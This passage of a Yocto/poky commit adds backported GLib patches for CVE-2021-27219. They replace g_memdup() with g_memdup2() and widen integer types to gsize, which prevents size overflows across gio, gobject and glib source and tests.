g_task_new (file, cancellable, callback, user_data); + g_task_set_source_tag (task, g_file_real_measure_disk_usage_async); +- g_task_set_task_data (task, g_memdup (&data, sizeof data), g_free); ++ g_task_set_task_data (task, g_memdup2 (&data, sizeof data), g_free); + g_task_set_priority (task, io_priority); + + g_task_run_in_thread (task, measure_disk_usage_thread); +--- a/gio/gsettingsschema.c ++++ b/gio/gsettingsschema.c +@@ -20,6 +20,7 @@ + + #include "gsettingsschema-internal.h" + #include "gsettings.h" ++#include "gstrfuncsprivate.h" + + #include "gvdb/gvdb-reader.h" + #include "strinfo.c" +@@ -1067,9 +1068,9 @@ g_settings_schema_list_children (GSettin + + if (g_str_has_suffix (key, "/")) + { +- gint length = strlen (key); ++ gsize length = strlen (key); + +- strv[j] = g_memdup (key, length); ++ strv[j] = g_memdup2 (key, length); + strv[j][length - 1] = '\0'; + j++; + } +--- a/gio/gwin32registrykey.c ++++ b/gio/gwin32registrykey.c +@@ -28,6 +28,8 @@ + #include + #include + ++#include "gstrfuncsprivate.h" ++ + #ifndef _WDMDDK_ + typedef enum _KEY_INFORMATION_CLASS { + KeyBasicInformation, +@@ -247,7 +249,7 @@ g_win32_registry_value_iter_copy (const + new_iter->value_name_size = iter->value_name_size; + + if (iter->value_data != NULL) +- new_iter->value_data = g_memdup (iter->value_data, iter->value_data_size); ++ new_iter->value_data = g_memdup2 (iter->value_data, iter->value_data_size); + + new_iter->value_data_size = iter->value_data_size; + +@@ -268,8 +270,8 @@ g_win32_registry_value_iter_copy (const + new_iter->value_data_expanded_charsize = iter->value_data_expanded_charsize; + + if (iter->value_data_expanded_u8 != NULL) +- new_iter->value_data_expanded_u8 = g_memdup (iter->value_data_expanded_u8, +- iter->value_data_expanded_charsize); ++ new_iter->value_data_expanded_u8 = g_memdup2 (iter->value_data_expanded_u8, ++ iter->value_data_expanded_charsize); + + new_iter->value_data_expanded_u8_size = iter->value_data_expanded_charsize; + +--- a/gio/tests/async-close-output-stream.c ++++ b/gio/tests/async-close-output-stream.c +@@ -24,6 +24,8 @@ + #include + #include + ++#include "gstrfuncsprivate.h" ++ + #define DATA_TO_WRITE "Hello world\n" + + typedef struct +@@ -147,9 +149,9 @@ prepare_data (SetupData *data, + + data->expected_size = g_memory_output_stream_get_data_size (G_MEMORY_OUTPUT_STREAM (data->data_stream)); + +- g_assert_cmpint (data->expected_size, >, 0); ++ g_assert_cmpuint (data->expected_size, >, 0); + +- data->expected_output = g_memdup (written, (guint)data->expected_size); ++ data->expected_output = g_memdup2 (written, data->expected_size); + + /* then recreate the streams and prepare them for the asynchronous close */ + destroy_streams (data); +--- a/gio/tests/gdbus-export.c ++++ b/gio/tests/gdbus-export.c +@@ -23,6 +23,7 @@ + #include + + #include "gdbus-tests.h" ++#include "gstrfuncsprivate.h" + + /* all tests rely on a shared mainloop */ + static GMainLoop *loop = NULL; +@@ -671,7 +672,7 @@ subtree_introspect (GDBusConnection + g_assert_not_reached (); + } + +- return g_memdup (interfaces, 2 * sizeof (void *)); ++ return g_memdup2 (interfaces, 2 * sizeof (void *)); + } + + static const GDBusInterfaceVTable * +@@ -727,7 +728,7 @@ dynamic_subtree_introspect (GDBusConnect + { + const GDBusInterfaceInfo *interfaces[2] = { &dyna_interface_info, NULL }; + +- return g_memdup (interfaces, 2 * sizeof (void *)); ++ return g_memdup2 (interfaces, 2 * sizeof (void *)); + } + + static const GDBusInterfaceVTable * +--- a/gio/win32/gwinhttpfile.c ++++ b/gio/win32/gwinhttpfile.c +@@ -29,6 +29,7 @@ + #include "gio/gfile.h" + #include "gio/gfileattribute.h" + #include "gio/gfileinfo.h" ++#include "gstrfuncsprivate.h" + #include "gwinhttpfile.h" + #include "gwinhttpfileinputstream.h" + #include "gwinhttpfileoutputstream.h" +@@ -393,10 +394,10 @@ + child = g_object_new (G_TYPE_WINHTTP_FILE, NULL); + child->vfs = winhttp_file->vfs; + child->url = winhttp_file->url; +- child->url.lpszScheme = g_memdup (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2); +- child->url.lpszHostName = g_memdup (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2); +- child->url.lpszUserName = g_memdup (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2); +- child->url.lpszPassword = g_memdup (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2); ++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2); ++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2); ++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2); ++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2); + child->url.lpszUrlPath = wnew_path; + child->url.dwUrlPathLength = wcslen (wnew_path); + child->url.lpszExtraInfo = NULL; diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch new file mode 100644 index 0000000000..eceff161a6 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch @@ -0,0 +1,131 @@ +From 6110caea45b235420b98cd41d845cc92238f6781 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Thu, 4 Feb 2021 13:39:25 +0000 +Subject: [PATCH 03/11] gobject: Use g_memdup2() instead of g_memdup() in + obvious places +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Convert all the call sites which use `g_memdup()`’s length argument +trivially (for example, by passing a `sizeof()`), so that they use +`g_memdup2()` instead. + +In almost all of these cases the use of `g_memdup()` would not have +caused problems, but it will soon be deprecated, so best port away from +it. + +Signed-off-by: Philip Withnall +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gobject/gsignal.c | 3 ++- + gobject/gtype.c | 9 +++++---- + gobject/gtypemodule.c | 3 ++- + gobject/tests/param.c | 4 +++- + 4 files changed, 12 insertions(+), 7 deletions(-) + +--- a/gobject/gsignal.c ++++ b/gobject/gsignal.c +@@ -28,6 +28,7 @@ + #include + + #include "gsignal.h" ++#include "gstrfuncsprivate.h" + #include "gtype-private.h" + #include "gbsearcharray.h" + #include "gvaluecollector.h" +@@ -1809,7 +1810,7 @@ g_signal_newv (const gchar *signal + node->single_va_closure_is_valid = FALSE; + node->flags = signal_flags & G_SIGNAL_FLAGS_MASK; + node->n_params = n_params; +- node->param_types = g_memdup (param_types, sizeof (GType) * n_params); ++ node->param_types = g_memdup2 (param_types, sizeof (GType) * n_params); + node->return_type = return_type; + node->class_closure_bsa = NULL; + if (accumulator) +--- a/gobject/gtype.c ++++ b/gobject/gtype.c +@@ -33,6 +33,7 @@ + + #include "glib-private.h" + #include "gconstructor.h" ++#include "gstrfuncsprivate.h" + + #ifdef G_OS_WIN32 + #include +@@ -1470,7 +1471,7 @@ type_add_interface_Wm (TypeNode + iholder->next = iface_node_get_holders_L (iface); + iface_node_set_holders_W (iface, iholder); + iholder->instance_type = NODE_TYPE (node); +- iholder->info = info ? g_memdup (info, sizeof (*info)) : NULL; ++ iholder->info = info ? g_memdup2 (info, sizeof (*info)) : NULL; + iholder->plugin = plugin; + + /* create an iface entry for this type */ +@@ -1731,7 +1732,7 @@ type_iface_retrieve_holder_info_Wm (Type + INVALID_RECURSION ("g_type_plugin_*", iholder->plugin, NODE_NAME (iface)); + + check_interface_info_I (iface, instance_type, &tmp_info); +- iholder->info = g_memdup (&tmp_info, sizeof (tmp_info)); ++ iholder->info = g_memdup2 (&tmp_info, sizeof (tmp_info)); + } + + return iholder; /* we don't modify write lock upon returning NULL */ +@@ -2016,10 +2017,10 @@ type_iface_vtable_base_init_Wm (TypeNode + IFaceEntry *pentry = type_lookup_iface_entry_L (pnode, iface); + + if (pentry) +- vtable = g_memdup (pentry->vtable, iface->data->iface.vtable_size); ++ vtable = g_memdup2 (pentry->vtable, iface->data->iface.vtable_size); + } + if (!vtable) +- vtable = g_memdup (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size); ++ vtable = g_memdup2 (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size); + entry->vtable = vtable; + vtable->g_type = NODE_TYPE (iface); + vtable->g_instance_type = NODE_TYPE (node); +--- a/gobject/gtypemodule.c ++++ b/gobject/gtypemodule.c +@@ -19,6 +19,7 @@ + + #include + ++#include "gstrfuncsprivate.h" + #include "gtypeplugin.h" + #include "gtypemodule.h" + +@@ -436,7 +437,7 @@ g_type_module_register_type (GTypeModule + module_type_info->loaded = TRUE; + module_type_info->info = *type_info; + if (type_info->value_table) +- module_type_info->info.value_table = g_memdup (type_info->value_table, ++ module_type_info->info.value_table = g_memdup2 (type_info->value_table, + sizeof (GTypeValueTable)); + + return module_type_info->type; +--- a/gobject/tests/param.c ++++ b/gobject/tests/param.c +@@ -2,6 +2,8 @@ + #include + #include + ++#include "gstrfuncsprivate.h" ++ + static void + test_param_value (void) + { +@@ -874,7 +876,7 @@ main (int argc, char *argv[]) + test_path = g_strdup_printf ("/param/implement/subprocess/%d-%d-%d-%d", + data.change_this_flag, data.change_this_type, + data.use_this_flag, data.use_this_type); +- test_data = g_memdup (&data, sizeof (TestParamImplementData)); ++ test_data = g_memdup2 (&data, sizeof (TestParamImplementData)); + g_test_add_data_func_full (test_path, test_data, test_param_implement_child, g_free); + g_free (test_path); + } diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch new file mode 100644 index 0000000000..6a3ac6b552 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch @@ -0,0 +1,298 @@ +Backport of: + +From 0736b7c1e7cf4232c5d7eb2b0fbfe9be81bd3baa Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Thu, 4 Feb 2021 13:41:21 +0000 +Subject: [PATCH 04/11] glib: Use g_memdup2() instead of g_memdup() in obvious + places +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Convert all the call sites which use `g_memdup()`’s length argument +trivially (for example, by passing a `sizeof()` or an existing `gsize` +variable), so that they use `g_memdup2()` instead. + +In almost all of these cases the use of `g_memdup()` would not have +caused problems, but it will soon be deprecated, so best port away from +it + +In particular, this fixes an overflow within `g_bytes_new()`, identified +as GHSL-2021-045 by GHSL team member Kevin Backhouse. + +Signed-off-by: Philip Withnall +Fixes: GHSL-2021-045 +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + glib/gbytes.c | 6 ++++-- + glib/gdir.c | 3 ++- + glib/ghash.c | 7 ++++--- + glib/giochannel.c | 5 +++-- + glib/gslice.c | 3 ++- + glib/gtestutils.c | 3 ++- + glib/gvariant.c | 7 ++++--- + glib/gvarianttype.c | 3 ++- + glib/tests/array-test.c | 4 +++- + glib/tests/option-context.c | 6 ++++-- + glib/tests/uri.c | 8 +++++--- + 11 files changed, 35 insertions(+), 20 deletions(-) + +--- a/glib/gbytes.c ++++ b/glib/gbytes.c +@@ -34,6 +34,8 @@ + + #include + ++#include "gstrfuncsprivate.h" ++ + /** + * GBytes: + * +@@ -95,7 +97,7 @@ g_bytes_new (gconstpointer data, + { + g_return_val_if_fail (data != NULL || size == 0, NULL); + +- return g_bytes_new_take (g_memdup (data, size), size); ++ return g_bytes_new_take (g_memdup2 (data, size), size); + } + + /** +@@ -499,7 +501,7 @@ g_bytes_unref_to_data (GBytes *bytes, + * Copy: Non g_malloc (or compatible) allocator, or static memory, + * so we have to copy, and then unref. + */ +- result = g_memdup (bytes->data, bytes->size); ++ result = g_memdup2 (bytes->data, bytes->size); + *size = bytes->size; + g_bytes_unref (bytes); + } +--- a/glib/gdir.c ++++ b/glib/gdir.c +@@ -37,6 +37,7 @@ + #include "gconvert.h" + #include "gfileutils.h" + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gtestutils.h" + #include "glibintl.h" + +@@ -112,7 +113,7 @@ g_dir_open_with_errno (const gchar *path + return NULL; + #endif + +- return g_memdup (&dir, sizeof dir); ++ return g_memdup2 (&dir, sizeof dir); + } + + /** +--- a/glib/ghash.c ++++ b/glib/ghash.c +@@ -34,6 +34,7 @@ + #include "gmacros.h" + #include "glib-private.h" + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gatomic.h" + #include "gtestutils.h" + #include "gslice.h" +@@ -962,7 +963,7 @@ g_hash_table_ensure_keyval_fits (GHashTa + if (hash_table->have_big_keys) + { + if (key != value) +- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size); ++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size); + /* Keys and values are both big now, so no need for further checks */ + return; + } +@@ -970,7 +971,7 @@ g_hash_table_ensure_keyval_fits (GHashTa + { + if (key != value) + { +- hash_table->values = g_memdup (hash_table->keys, sizeof (guint) * hash_table->size); ++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (guint) * hash_table->size); + is_a_set = FALSE; + } + } +@@ -998,7 +999,7 @@ g_hash_table_ensure_keyval_fits (GHashTa + + /* Just split if necessary */ + if (is_a_set && key != value) +- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size); ++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size); + + #endif + } +--- a/glib/giochannel.c ++++ b/glib/giochannel.c +@@ -35,7 +35,7 @@ + #include + + #include "giochannel.h" +- ++#include "gstrfuncsprivate.h" + #include "gstrfuncs.h" + #include "gtestutils.h" + #include "glibintl.h" + +@@ -1673,10 +1674,10 @@ g_io_channel_read_line (GIOChannel *cha + + /* Copy the read bytes (including any embedded nuls) and nul-terminate. + * `USE_BUF (channel)->str` is guaranteed to be nul-terminated as it’s a +- * #GString, so it’s safe to call g_memdup() with +1 length to allocate ++ * #GString, so it’s safe to call g_memdup2() with +1 length to allocate + * a nul-terminator. */ + g_assert (USE_BUF (channel)); +- line = g_memdup (USE_BUF (channel)->str, got_length + 1); ++ line = g_memdup2 (USE_BUF (channel)->str, got_length + 1); + line[got_length] = '\0'; + *str_return = g_steal_pointer (&line); + g_string_erase (USE_BUF (channel), 0, got_length); +--- a/glib/gslice.c ++++ b/glib/gslice.c +@@ -41,6 +41,7 @@ + #include "gmain.h" + #include "gmem.h" /* gslice.h */ + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gutils.h" + #include "gtrashstack.h" + #include "gtestutils.h" +@@ -350,7 +351,7 @@ g_slice_get_config_state (GSliceConfig c + array[i++] = allocator->contention_counters[address]; + array[i++] = allocator_get_magazine_threshold (allocator, address); + *n_values = i; +- return g_memdup (array, sizeof (array[0]) * *n_values); ++ return g_memdup2 (array, sizeof (array[0]) * *n_values); + default: + return NULL; + } +--- a/glib/gtestutils.c ++++ b/glib/gtestutils.c +@@ -49,6 +49,7 @@ + #include "gpattern.h" + #include "grand.h" + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gtimer.h" + #include "gslice.h" + #include "gspawn.h" +@@ -3803,7 +3804,7 @@ g_test_log_extract (GTestLogBuffer *tbuf + if (p <= tbuffer->data->str + mlength) + { + g_string_erase (tbuffer->data, 0, mlength); +- tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup (&msg, sizeof (msg))); ++ tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup2 (&msg, sizeof (msg))); + return TRUE; + } + +--- a/glib/gvariant.c ++++ b/glib/gvariant.c +@@ -33,6 +33,7 @@ + + #include + ++#include "gstrfuncsprivate.h" + + /** + * SECTION:gvariant +@@ -725,7 +726,7 @@ g_variant_new_variant (GVariant *value) + g_variant_ref_sink (value); + + return g_variant_new_from_children (G_VARIANT_TYPE_VARIANT, +- g_memdup (&value, sizeof value), ++ g_memdup2 (&value, sizeof value), + 1, g_variant_is_trusted (value)); + } + +@@ -1229,7 +1230,7 @@ g_variant_new_fixed_array (const GVarian + return NULL; + } + +- data = g_memdup (elements, n_elements * element_size); ++ data = g_memdup2 (elements, n_elements * element_size); + value = g_variant_new_from_data (array_type, data, + n_elements * element_size, + FALSE, g_free, data); +@@ -1908,7 +1909,7 @@ g_variant_dup_bytestring (GVariant *valu + if (length) + *length = size; + +- return g_memdup (original, size + 1); ++ return g_memdup2 (original, size + 1); + } + + /** +--- a/glib/gvarianttype.c ++++ b/glib/gvarianttype.c +@@ -28,6 +28,7 @@ + + #include + ++#include "gstrfuncsprivate.h" + + /** + * SECTION:gvarianttype +@@ -1181,7 +1182,7 @@ g_variant_type_new_tuple (const GVariant + g_assert (offset < sizeof buffer); + buffer[offset++] = ')'; + +- return (GVariantType *) g_memdup (buffer, offset); ++ return (GVariantType *) g_memdup2 (buffer, offset); + } + + /** +--- a/glib/tests/array-test.c ++++ b/glib/tests/array-test.c +@@ -29,6 +29,8 @@ + #include + #include "glib.h" + ++#include "gstrfuncsprivate.h" ++ + /* Test data to be passed to any function which calls g_array_new(), providing + * the parameters for that call. Most #GArray tests should be repeated for all + * possible values of #ArrayTestData. */ +@@ -1917,7 +1919,7 @@ byte_array_new_take (void) + GByteArray *gbarray; + guint8 *data; + +- data = g_memdup ("woooweeewow", 11); ++ data = g_memdup2 ("woooweeewow", 11); + gbarray = g_byte_array_new_take (data, 11); + g_assert (gbarray->data == data); + g_assert_cmpuint (gbarray->len, ==, 11); +--- a/glib/tests/option-context.c ++++ b/glib/tests/option-context.c +@@ -27,6 +27,8 @@ + #include + #include + ++#include "gstrfuncsprivate.h" ++ + static GOptionEntry main_entries[] = { + { "main-switch", 0, 0, + G_OPTION_ARG_NONE, NULL, +@@ -256,7 +258,7 @@ join_stringv (int argc, char **argv) + static char ** + copy_stringv (char **argv, int argc) + { +- return g_memdup (argv, sizeof (char *) * (argc + 1)); ++ return g_memdup2 (argv, sizeof (char *) * (argc + 1)); + } + + static void +@@ -2323,7 +2325,7 @@ test_group_parse (void) + g_option_context_add_group (context, group); + + argv = split_string ("program --test arg1 -f arg2 --group-test arg3 --frob arg4 -z arg5", &argc); +- orig_argv = g_memdup (argv, (argc + 1) * sizeof (char *)); ++ orig_argv = g_memdup2 (argv, (argc + 1) * sizeof (char *)); + + retval = g_option_context_parse (context, &argc, &argv, &error); + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch new file mode 100644 index 0000000000..4f86522d00 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch @@ -0,0 +1,54 @@ +From 0cbad673215ec8a049b7fe2ff44b0beed31b376e Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Thu, 4 Feb 2021 16:12:24 +0000 +Subject: [PATCH 05/11] gwinhttpfile: Avoid arithmetic overflow when + calculating a size +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The members of `URL_COMPONENTS` (`winhttp_file->url`) are `DWORD`s, i.e. +32-bit unsigned integers. Adding to and multiplying them may cause them +to overflow the unsigned integer bounds, even if the result is passed to +`g_memdup2()` which accepts a `gsize`. + +Cast the `URL_COMPONENTS` members to `gsize` first to ensure that the +arithmetic is done in terms of `gsize`s rather than unsigned integers. + +Spotted by Sebastian Dröge. + +Signed-off-by: Philip Withnall +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/win32/gwinhttpfile.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/gio/win32/gwinhttpfile.c b/gio/win32/gwinhttpfile.c +index 3f8fbd838..e0340e247 100644 +--- a/gio/win32/gwinhttpfile.c ++++ b/gio/win32/gwinhttpfile.c +@@ -410,10 +410,10 @@ g_winhttp_file_resolve_relative_path (GFile *file, + child = g_object_new (G_TYPE_WINHTTP_FILE, NULL); + child->vfs = winhttp_file->vfs; + child->url = winhttp_file->url; +- child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2); +- child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2); +- child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2); +- child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2); ++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, ((gsize) winhttp_file->url.dwSchemeLength + 1) * 2); ++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, ((gsize) winhttp_file->url.dwHostNameLength + 1) * 2); ++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, ((gsize) winhttp_file->url.dwUserNameLength + 1) * 2); ++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, ((gsize) winhttp_file->url.dwPasswordLength + 1) * 2); + child->url.lpszUrlPath = wnew_path; + child->url.dwUrlPathLength = wcslen (wnew_path); + child->url.lpszExtraInfo = NULL; +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch new file mode 100644 index 0000000000..d8043f5e29 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch @@ -0,0 +1,101 @@ +From f9ee2275cbc312c0b4cdbc338a4fbb76eb36fb9a Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Thu, 4 Feb 2021 13:49:00 +0000 +Subject: [PATCH 06/11] gdatainputstream: Handle stop_chars_len internally as + gsize + +Previously it was handled as a `gssize`, which meant that if the +`stop_chars` string was longer than `G_MAXSSIZE` there would be an +overflow. + +Signed-off-by: Philip Withnall +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/gdatainputstream.c | 25 +++++++++++++++++-------- + 1 file changed, 17 insertions(+), 8 deletions(-) + +diff --git a/gio/gdatainputstream.c b/gio/gdatainputstream.c +index 2e7750cb5..2cdcbda19 100644 +--- a/gio/gdatainputstream.c ++++ b/gio/gdatainputstream.c +@@ -27,6 +27,7 @@ + #include "gioenumtypes.h" + #include "gioerror.h" + #include "glibintl.h" ++#include "gstrfuncsprivate.h" + + #include + +@@ -856,7 +857,7 @@ static gssize + scan_for_chars (GDataInputStream *stream, + gsize *checked_out, + const char *stop_chars, +- gssize stop_chars_len) ++ gsize stop_chars_len) + { + GBufferedInputStream *bstream; + const char *buffer; +@@ -952,7 +953,7 @@ typedef struct + gsize checked; + + gchar *stop_chars; +- gssize stop_chars_len; ++ gsize stop_chars_len; + gsize length; + } GDataInputStreamReadData; + +@@ -1078,12 +1079,17 @@ g_data_input_stream_read_async (GDataInputStream *stream, + { + GDataInputStreamReadData *data; + GTask *task; ++ gsize stop_chars_len_unsigned; + + data = g_slice_new0 (GDataInputStreamReadData); +- if (stop_chars_len == -1) +- stop_chars_len = strlen (stop_chars); +- data->stop_chars = g_memdup (stop_chars, stop_chars_len); +- data->stop_chars_len = stop_chars_len; ++ ++ if (stop_chars_len < 0) ++ stop_chars_len_unsigned = strlen (stop_chars); ++ else ++ stop_chars_len_unsigned = (gsize) stop_chars_len; ++ ++ data->stop_chars = g_memdup2 (stop_chars, stop_chars_len_unsigned); ++ data->stop_chars_len = stop_chars_len_unsigned; + data->last_saw_cr = FALSE; + + task = g_task_new (stream, cancellable, callback, user_data); +@@ -1338,17 +1344,20 @@ g_data_input_stream_read_upto (GDataInputStream *stream, + gssize found_pos; + gssize res; + char *data_until; ++ gsize stop_chars_len_unsigned; + + g_return_val_if_fail (G_IS_DATA_INPUT_STREAM (stream), NULL); + + if (stop_chars_len < 0) +- stop_chars_len = strlen (stop_chars); ++ stop_chars_len_unsigned = strlen (stop_chars); ++ else ++ stop_chars_len_unsigned = (gsize) stop_chars_len; + + bstream = G_BUFFERED_INPUT_STREAM (stream); + + checked = 0; + +- while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len)) == -1) ++ while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len_unsigned)) == -1) + { + if (g_buffered_input_stream_get_available (bstream) == + g_buffered_input_stream_get_buffer_size (bstream)) +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch new file mode 100644 index 0000000000..f183939c45 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch @@ -0,0 +1,76 @@ +From 2aaf593a9eb96d84fe3be740aca2810a97d95592 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Thu, 4 Feb 2021 13:50:37 +0000 +Subject: [PATCH 07/11] gwin32: Use gsize internally in g_wcsdup() +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows it to handle strings up to length `G_MAXSIZE` — previously +it would overflow with such strings. + +Update the several copies of it identically. + +Signed-off-by: Philip Withnall +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/gwin32registrykey.c | 34 ++++++++++++++++++++++++++-------- + 2 files changed, 38 insertions(+), 16 deletions(-) + +diff --git a/gio/gwin32registrykey.c b/gio/gwin32registrykey.c +index 548a94188..2eb67daf8 100644 +--- a/gio/gwin32registrykey.c ++++ b/gio/gwin32registrykey.c +@@ -127,16 +127,34 @@ typedef enum + G_WIN32_REGISTRY_UPDATED_PATH = 1, + } GWin32RegistryKeyUpdateFlag; + ++static gsize ++g_utf16_len (const gunichar2 *str) ++{ ++ gsize result; ++ ++ for (result = 0; str[0] != 0; str++, result++) ++ ; ++ ++ return result; ++} ++ + static gunichar2 * +-g_wcsdup (const gunichar2 *str, +- gssize str_size) ++g_wcsdup (const gunichar2 *str, gssize str_len) + { +- if (str_size == -1) +- { +- str_size = wcslen (str) + 1; +- str_size *= sizeof (gunichar2); +- } +- return g_memdup (str, str_size); ++ gsize str_len_unsigned; ++ gsize str_size; ++ ++ g_return_val_if_fail (str != NULL, NULL); ++ ++ if (str_len < 0) ++ str_len_unsigned = g_utf16_len (str); ++ else ++ str_len_unsigned = (gsize) str_len; ++ ++ g_assert (str_len_unsigned <= G_MAXSIZE / sizeof (gunichar2) - 1); ++ str_size = (str_len_unsigned + 1) * sizeof (gunichar2); ++ ++ return g_memdup2 (str, str_size); + } + + /** +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch new file mode 100644 index 0000000000..ffafc35c07 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch @@ -0,0 +1,101 @@ +From ba8ca443051f93a74c0d03d62e70402036f967a5 Mon Sep 17 00:00:00 2001 +From: Philip Withnall +Date: Thu, 4 Feb 2021 13:58:32 +0000 +Subject: [PATCH 08/11] gkeyfilesettingsbackend: Handle long keys when + converting paths + +Previously, the code in `convert_path()` could not handle keys longer +than `G_MAXINT`, and would overflow if that was exceeded. + +Convert the code to use `gsize` and `g_memdup2()` throughout, and +change from identifying the position of the final slash in the string +using a signed offset `i`, to using a pointer to the character (and +`strrchr()`). This allows the slash to be at any position in a +`G_MAXSIZE`-long string, without sacrificing a bit of the offset for +indicating whether a slash was found. + +Signed-off-by: Philip Withnall +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh +Signed-off-by: Ranjitsinh Rathod + +--- + gio/gkeyfilesettingsbackend.c | 21 ++++++++++----------- + 1 file changed, 10 insertions(+), 11 deletions(-) + +diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c +index cd5765afd..25b057672 100644 +--- a/gio/gkeyfilesettingsbackend.c ++++ b/gio/gkeyfilesettingsbackend.c +@@ -33,6 